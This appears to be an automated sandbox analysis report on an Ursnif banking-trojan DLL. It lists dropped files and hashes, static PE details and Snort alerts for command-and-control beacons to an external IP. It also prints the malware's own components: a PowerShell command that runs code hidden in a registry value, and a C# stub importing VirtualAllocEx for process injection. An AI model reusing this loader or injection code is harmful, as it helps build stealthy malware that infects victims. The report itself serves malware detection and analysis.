                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...d.d.w.u.z.i.g.h...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:false
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.260808918395778
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fpvJUzxs7+AEszIwkn23fpF9:p37Lvkmb6KRfhv+WZEifhr
                                                          MD5:0330280B07D13A01DEC77E2EDC601878
                                                          SHA1:D0F5CBC44E5B7DDD673F51164A68DE0C47E7EC74
                                                          SHA-256:A6904C47757F5AC51C966E7BC9D0BC5B6EB9F09C53FC843CD3B28ACF44DA2F37
                                                          SHA-512:6E6B2A6F74845D5207AA9D57558E701B842392CB1D89B02ECAFEACAB746C22054E9A92F7AB9D7A5B8C9A7C7764CEB054F6CA17AF7DE9A6A54C8F28C0110EEB87
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6445805370692286
                                                          Encrypted:false
                                                          SSDEEP:24:etGSi/WMOWEey8MTz7X8daP0eWQyaDdWSWtJ0DtkZfgB/7XI+ycuZhNbWakSyHPE:6i/A7KMTcd6qZkWPVJgh1ulqa3+q
                                                          MD5:A4133BB77D49BF5FE87ABE8507B3EBD7
                                                          SHA1:1871D83D9E0E0850DF8F2146693135C4F7770EE5
                                                          SHA-256:365D9862EAB5F5F08A5926E86058C33BE06692E309FD3D5F53085BF7636CD97F
                                                          SHA-512:17EDADBCD3E5AE487E6652567B5A046AD4955084458B5951A9C365C9BC43E43A7EF67D5109F4E4319A98695CF30FF18046F8796F3042BC82D30605BF209FA36C
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.ddwuzigh.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
                                                          Entropy (8bit):4.871364761010112
                                                          Encrypted:false
                                                          SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                          MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                          SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                          SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                          SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                          Malicious:false
                                                          Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\CSC58F6D56599B14CCABEBFA477BAE65D74.TMP
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):652
                                                          Entropy (8bit):3.1124345771696067
                                                          Encrypted:false
                                                          SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryTak7YnqqfPN5Dlq5J:+RI+ycuZhNRakSfPNnqX
                                                          MD5:B7D8E5C3BC81D5C419A478823788E0F7
                                                          SHA1:CCF5C55CAC587EBB0C20A4FB2D615BA1746EB793
                                                          SHA-256:570747FD73BC71FF18100C1F1F58F31127BB6497396718176BDE33882C949C36
                                                          SHA-512:5B42A169F5F8A6D9EF707BFF46CFF188027473576C4FA1E0C5E1C4D214AFAB5FD92131DA1F7CF2276985A6B514511C08241BDF300B6B763E6CAF43823CF24912
                                                          Malicious:false
                                                          Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...k.e.e.h.v.x.m.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text
                                                          Category:dropped
                                                          Size (bytes):421
                                                          Entropy (8bit):5.017019370437066
                                                          Encrypted:false
                                                          SSDEEP:6:V/DsYLDS81zuJzLHMRSRa+eNMjSSRrLypSRHq1oZ6laAkKFM+Qy:V/DTLDfuxLP9eg5rLy4uMaLXjQy
                                                          MD5:7504862525C83E379C573A3C2BB810C6
                                                          SHA1:3C7E3F89955F07E061B21107DAEF415E0D0C5F5E
                                                          SHA-256:B81B8E100611DBCEC282117135F47C781087BD95A01DC5496CAC6BE334A8B0CC
                                                          SHA-512:BC8C4EAD30E12FB619762441B9E84A4E7DF15D23782F80284378129F95FAD5A133D10C975795EEC6DA2564EC4D7F75430C45CA7113A8BFF2D1AFEE0331F13E76
                                                          Malicious:true
                                                          Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tjuivx. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint yijswysfmu,uint rpdwbh);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr hkhhmwnsoyn,IntPtr xfehjdcey,uint nqamet,uint rvtfunn,uint mlrfbdrm);.. }..}.
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.cmdline
                                                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                          Category:dropped
                                                          Size (bytes):369
                                                          Entropy (8bit):5.271207229716755
                                                          Encrypted:false
                                                          SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23fCN5WNDJH0zxs7+AEszIwkn23fCN5W5:p37Lvkmb6KRfJB+WZEifJrFH
                                                          MD5:6CF8D7A784B60B520B01D64CFDEC3508
                                                          SHA1:CD91CFE9EF2EDA8F6411ED9A6817FD7553709484
                                                          SHA-256:9903E082EA138385CE8CA2418FD1848F422EA4391352B5B5ED57D12C69500D7B
                                                          SHA-512:4FDD957F2C27F2E0C566066310715DD6A4F70921E8140FCDC8893931E2D72DB1E79CB96AB74714250AD0735C9502B4BE767FE3FDD82CE4A14519C56F9C690BC6
                                                          Malicious:false
                                                          Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.0.cs"
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):3584
                                                          Entropy (8bit):2.6442225461586313
                                                          Encrypted:false
                                                          SSDEEP:24:etGSrXWMOWEey8MTz7X8daP0eWQSDdWSWtJ0DtkZf6mBqO7XI+ycuZhNRakSfPNq:6bA7KMTcd6q1WPVJ6mU81ulRa39q
                                                          MD5:DE4F576253BDA1AE82659E3E111C25E6
                                                          SHA1:8A1237FCD0B3E732089509C1AA08FD31532A7564
                                                          SHA-256:599CF9AE58AA3E33D27F5A6B179DC111FCE16A907A2BA8EFEE485E483A07DD44
                                                          SHA-512:388163ABC93D673A14C861172E2BAE47078E38114660CAC4361433B8A1E7EADE57BAFEC90753C1BE5F60FDFCE7EF7A61966AF51642DF979CF8CA4A447AAA1F8A
                                                          Malicious:false
                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....2^a...........!.................$... ...@....... ....................................@..................................#..O....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...P...#~......L...#Strings............#US.........#GUID... ...T...#Blob...........G.........%3............................................................2.+...................................................... 9............ K............ S.....P ......b.........h.....s.....z...........................b.!...b...!.b.&...b.......+.....4.A.....9.......K.......S......................................."..........<Module>.keehvxm3.dll.tjuivx.W32.ms
                                                          C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.out
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:ASCII text, with CRLF, CR line terminators
                                                          Category:modified
                                                          Size (bytes):412
Entropy (8bit): 4.871364761010112
Encrypted: false
SSDEEP: 12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5: 83B3C9D9190CE2C57B83EEE13A9719DF
SHA1: ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256: B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512: 0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious: false
Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\Documents\20211007\PowerShell_transcript.910646.NcA_PxyH.20211007013229.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1189
Entropy (8bit): 5.305482263812092
Encrypted: false
SSDEEP: 24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWxHjeTKKjX4CIym1ZJXyOLCHGIYBtB7nxSAO:BZqvjQoORFeVxqDYB1ZQFerZZw
MD5: 59590A90D28BC6CF4C8C601B8DD050B5
SHA1: 683AE8715C414BA8B4FBB180D5428437C1A0C239
SHA-256: 98CB74CD1B59345C836ECAFD81BF563BE36E0931F98D07D4643D2F2A01B124EF
SHA-512: DAC46930F0F98749EF7719761FD4D9A5E6E3EDF6AD16810CF6CD90164A9F08E66E8155F4583AE80D75DAC6F2C89B30C4E3142099A28B97B8C970403D5483DF9F
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 4588..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..

C:\Users\user\Documents\20211007\PowerShell_transcript.910646.uobBzu5J.20211007013230.txt
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type: UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category: dropped
Size (bytes): 1189
Entropy (8bit): 5.308334237745025
Encrypted: false
SSDEEP: 24:BxSAs7vBZQx2DOXUWOLCHGIYBtBCWWHjeTKKjX4CIym1ZJXyOLCHGIYBtBamnxS8:BZqvjQoORFeVWqDYB1ZQFeaoZZ6C
MD5: F38AD184905D39ED5F604BD58DF787FB
SHA1: DA25886901C51B476DD82D233102E94B5E61B6E2
SHA-256: CF176D0FC864490B8181A27D38241E0140ADBB22A58ACB2F4791909922E08C31
SHA-512: AB3EEB69125BAA4D4E14C89361B05C6D551F46B370919601E5C8E64D211E9FB66966664E379B90E61CA0640E738B625B03FE8B3457824ACDBC55F87A2D2F5524
Malicious: false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20211007013230..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 910646 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..Process ID: 3740..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211007013230..**********************..PS>iex ([System.Text.Encoding]::ASCII.GetString(( gp HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550).UtilTool))..**********************..

\Device\ConDrv
Process: C:\Windows\System32\nslookup.exe
File Type: ASCII text, with CRLF, CR line terminators
Category: dropped
Size (bytes): 28
Entropy (8bit): 4.039148671903071
Encrypted: false
SSDEEP: 3:U+6QlBxAN:U+7BW
MD5: D796BA3AE0C072AA0E189083C7E8C308
SHA1: ABB1B68758B9C2BF43018A4AEAE2F2E72B626482
SHA-256: EF17537B7CAAB3B16493F11A099F3192D5DCD911C1E8DF0F68FE4AB6531FB43E
SHA-512: BF497C5ACF74DE2446834E93900E92EC021FC03A7F1D3BF7453024266349CCE39C5193E64ACBBD41E3A037473A9DB6B2499540304EAD51E002EF3B747748BF36
Malicious: false
Preview: Non-authoritative answer:...

Static File Info

General

File type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.647077324309591
TrID:
• Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
• Generic Win/DOS Executable (2004/3) 0.20%
• DOS Executable Generic (2002/1) 0.20%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: data.dll
File size: 453131
MD5: b0165e4e73dad2ac1cb519ea1eab8bd6
SHA1: 4ebb5db088d233d4c85b19b299613a240ce25c95
SHA256: 7ff6558fd39f6d8db53aa0baa3f3a9b1edb02ea2631102b6d85eafaf4bbd702b
SHA512: 0f19a2902265b9e56e8f46ffe283a2796142ab59ef42d97a957bb6327494f838d8a262b957152ad768322bca4b2c05188c386c54a5c65c77c60c3205c742ea30
SSDEEP: 12288:kHlAiJHCwjXvMHk37t4Mv//IfN/YoyL8ozF0nxatQ7:kHltJHCkvH/IJvUWxata
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............g...g...g....l..g..K.8..g...9...g...9...g....0..g...9...g....4..g...g...f...9...g...9..(g...9...g...9...g...9...g..Rich.g.

File Icon

Icon Hash: 74f0e4ecccdce0e4

Static PE Info

General

Entrypoint: 0x10007197
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x10000000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x57EEB746 [Fri Sep 30 19:04:38 2016 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 3a94ffcdb86144f7d0b6d92dd3393d93
Entrypoint Preview

Instruction
push ebp
mov ebp, esp
cmp dword ptr [ebp+0Ch], 01h
jne 00007F83D8F13BC7h
call 00007F83D8F1435Bh
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+08h]
call 00007F83D8F13A7Ah
add esp, 0Ch
pop ebp
retn 000Ch
push ebp
mov ebp, esp
push 00000000h
call dword ptr [1004F06Ch]
push dword ptr [ebp+08h]
call dword ptr [1004F068h]
push C0000409h
call dword ptr [1004F060h]
push eax
call dword ptr [1004F070h]
pop ebp
ret
push ebp
mov ebp, esp
sub esp, 00000324h
push 00000017h
call 00007F83D8F47B7Fh
test eax, eax
je 00007F83D8F13BC7h
push 00000002h
pop ecx
int 29h
mov dword ptr [1006CD98h], eax
mov dword ptr [1006CD94h], ecx
mov dword ptr [1006CD90h], edx
mov dword ptr [1006CD8Ch], ebx
mov dword ptr [1006CD88h], esi
mov dword ptr [1006CD84h], edi
mov word ptr [1006CDB0h], ss
mov word ptr [1006CDA4h], cs
mov word ptr [1006CD80h], ds
mov word ptr [1006CD7Ch], es
mov word ptr [1006CD78h], fs
mov word ptr [1006CD74h], gs
pushfd
pop dword ptr [1006CDA8h]
mov eax, dword ptr [ebp+00h]
mov dword ptr [1006CD9Ch], eax
mov eax, dword ptr [ebp+04h]
mov dword ptr [1006CDA0h], eax

Rich Headers

Programming Language:
• [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x6ae90 | 0xb0 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x6af40 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x109000 | 0x440 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x10a000 | 0x2cbc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x69140 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x69198 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x4f000 | 0x19c | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x4d48c | 0x4d600 | False | 0.541116594305 | data | 6.75100933622 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x4f000 | 0x1c8ec | 0x1ca00 | False | 0.58397584607 | data | 5.72385266985 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6c000 | 0x9b7e8 | 0xe00 | False | 0.204520089286 | data | 2.89792338491 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.gfids | 0x108000 | 0x228 | 0x400 | False | 0.2529296875 | data | 1.74193986935 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc | 0x109000 | 0x440 | 0x600 | False | 0.292317708333 | data | 2.5339353314 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x10a000 | 0x2cbc | 0x2e00 | False | 0.777513586957 | data | 6.63564333671 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name | RVA | Size | Type | Language | Country
RT_VERSION | 0x109060 | 0x3dc | data | English | United States

Imports

DLL | Import
KERNEL32.dll | TlsAlloc, LoadLibraryW, VirtualProtectEx, GetModuleHandleW, CreateSemaphoreW, GetTempPathW, WriteConsoleW, CloseHandle, CreateFileW, OutputDebugStringW, ReadConsoleW, GetEnvironmentVariableW, InitializeCriticalSection, GetModuleFileNameW, RemoveDirectoryW, DeviceIoControl, GetCurrentProcess, EnterCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, IsDebuggerPresent, GetStartupInfoW, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, EncodePointer, RaiseException, InterlockedPushEntrySList, InterlockedFlushSList, GetLastError, SetLastError, RtlUnwind, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, GetProcAddress, LoadLibraryExW, ExitProcess, GetModuleHandleExW, HeapFree, HeapAlloc, GetCurrentThread, GetDateFormatW, GetTimeFormatW, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, GetProcessHeap, GetStdHandle, GetFileType, SetConsoleCtrlHandler, GetStringTypeW, HeapSize, HeapReAlloc, SetStdHandle, FlushFileBuffers, WriteFile, GetConsoleCP, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, ReadFile, DecodePointer
ole32.dll | CoUninitialize, CoTaskMemAlloc, CoInitialize, CoTaskMemFree
CRYPTUI.dll | CryptUIDlgViewContext, CryptUIDlgViewCertificateW, CryptUIWizDigitalSign, CryptUIWizFreeDigitalSignContext, CryptUIWizImport, CryptUIWizExport, CryptUIDlgSelectCertificateFromStore

Exports

Name | Ordinal | Address
Bonebegin | 1 | 0x1003f370
Father | 2 | 0x1003f4d0
Ratherdesign | 3 | 0x1003f680
Scorematch | 4 | 0x1003f6f0
Silverwere | 5 | 0x1003f6d0
StoneNumeral | 6 | 0x1003f7e0

Version Infos

Description | Data
LegalCopyright | Fig Governhear suggest Corporation. All rights reserved
InternalName | Ropemother Smellclean
FileVersion | 5.6.0.165
CompanyName | Fig Governhear suggest Corporation Alsoheld
ProductName | Fig Governhear suggest Shoecould Quietfrom
ProductVersion | 5.6.0.165
FileDescription | Fig Governhear suggest Shoecould Quietfrom
OriginalFilename | Soon.dll
Translation | 0x0409 0x04b0

Possible Origin

Language of compilation system | Country where language is spoken
English | United States
Network Behavior

Snort IDS Alerts

Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
10/07/21-01:32:18.233038 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49776 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:19.242466 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49777 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:19.340180 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49778 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:19.340180 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49778 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:20.827048 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49779 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:20.827048 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49779 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:20.886424 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49780 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:20.886424 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49780 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:23.671129 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49781 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:32:23.671129 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49781 | 80 | 192.168.2.4 | 194.147.86.221
10/07/21-01:34:00.834180 | TCP | 2033204 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) | 49862 | 80 | 192.168.2.4 | 194.147.86.221
